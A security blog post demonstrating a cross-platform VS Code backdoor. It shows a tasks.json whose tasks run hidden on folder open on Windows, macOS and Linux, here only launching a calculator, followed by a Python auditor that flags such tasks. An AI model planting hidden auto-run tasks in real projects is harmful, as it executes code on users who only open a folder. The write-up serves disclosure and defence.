VSCode Project Multi-Platform Backdoor
Published June 12, 2025

Intro
A few days ago someone posted a VS Code backdoor on GitHub, but it was only for Windows. In a real-world scenario, an attacker would target multiple platforms.
How the backdoor works
The backdoor uses the .vscode/tasks.json file, which declares task commands that can be malicious. When a user opens the VS Code project directory and trusts the project, the payload is executed.
The VS Code task definition JSON file allows an adversary to target multiple operating systems by social-engineering VS Code users into opening the malicious project.
The backdoor
Let's pop a calc!
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "VS",
      "type": "shell",
      "command": "powershell",
      "args": [
        "-WindowStyle", "Hidden",
        "-Command",
        "Start-Process calc.exe"
      ],
      "problemMatcher": [],
      "group": {
        "kind": "build",
        "isDefault": true
      },
      "runOptions": {
        "runOn": "folderOpen"
      },
      "presentation": {
        "echo": false,
        "reveal": "never",
        "focus": false,
        "panel": "dedicated"
      },
      "os": "windows"
    },
    {
      "label": "VS-OSX",
      "type": "shell",
      "command": "open",
      "args": [
        "-a",
        "Calculator"
      ],
      "problemMatcher": [],
      "group": {
        "kind": "build"
      },
      "runOptions": {
        "runOn": "folderOpen"
      },
      "presentation": {
        "echo": false,
        "reveal": "never",
        "focus": false,
        "panel": "dedicated"
      },
      "os": "osx"
    },
    {
      "label": "VS-Linux",
      "type": "shell",
      "command": "gnome-calculator",
      "problemMatcher": [],
      "group": {
        "kind": "build"
      },
      "runOptions": {
        "runOn": "folderOpen"
      },
      "presentation": {
        "echo": false,
        "reveal": "never",
        "focus": false,
        "panel": "dedicated"
      },
      "os": "linux"
    }
  ]
}
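
To review a cloned project before trusting it, the tasks file can be audited for the pattern shown above: tasks that run on folder open, and whether their output is suppressed. The following is an added example, not code from the original post; the function names and the sample input are constructed for illustration.

```python
import json
import re
from pathlib import Path
# tasks.json is JSONC. Both patterns match string literals first so they stay intact;
# the first drops // and /* */ comments, the second drops a trailing comma before } or ].
_COMMENT = re.compile(r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/', re.S)
_TRAILING = re.compile(r'("(?:\\.|[^"\\])*")|,(\s*[}\]])')

def parse_jsonc(text):
    """Parse JSON that may contain comments and trailing commas."""
    text = _COMMENT.sub(lambda m: m.group(0) if m.group(0)[0] == '"' else "", text)
    text = _TRAILING.sub(lambda m: m.group(1) or m.group(2), text)
    return json.loads(text)

def audit_tasks(text):
    """Return one finding per task that runs automatically on folder open."""
    findings = []
    for task in parse_jsonc(text).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        pres = task.get("presentation", {})
        parts = [task.get("command", "")] + task.get("args", [])
        findings.append({
            "label": task.get("label"),
            "command": " ".join(str(p) for p in parts),
            "hidden": pres.get("reveal") == "never" or pres.get("echo") is False,
        })
    return findings

def scan_tree(root):
    """Audit every .vscode/tasks.json under root; report unparsable files too."""
    results = {}
    for path in Path(root).rglob(".vscode/tasks.json"):
        try:
            results[str(path)] = audit_tasks(path.read_text(encoding="utf-8"))
        except (ValueError, OSError, AttributeError, TypeError) as exc:
            results[str(path)] = [{"label": None, "command": f"unparsed: {exc}", "hidden": False}]
    return results

# Constructed sample modelled on the page's Linux task, plus a benign task.
SAMPLE = '''{
  "tasks": [
    { "label": "VS-Linux", "type": "shell", "command": "gnome-calculator",
      "runOptions": { "runOn": "folderOpen" },  // auto-run on open
      "presentation": { "echo": false, "reveal": "never" } },
    { "label": "build", "type": "shell", "command": "make", "args": ["all"], },
  ]
}'''

if __name__ == "__main__":
    print(audit_tasks(SAMPLE))
```

Run scan_tree on a directory of checkouts before opening any of them in the editor. Setting task.allowAutomaticTasks to off in user settings also stops folderOpen tasks from starting on their own.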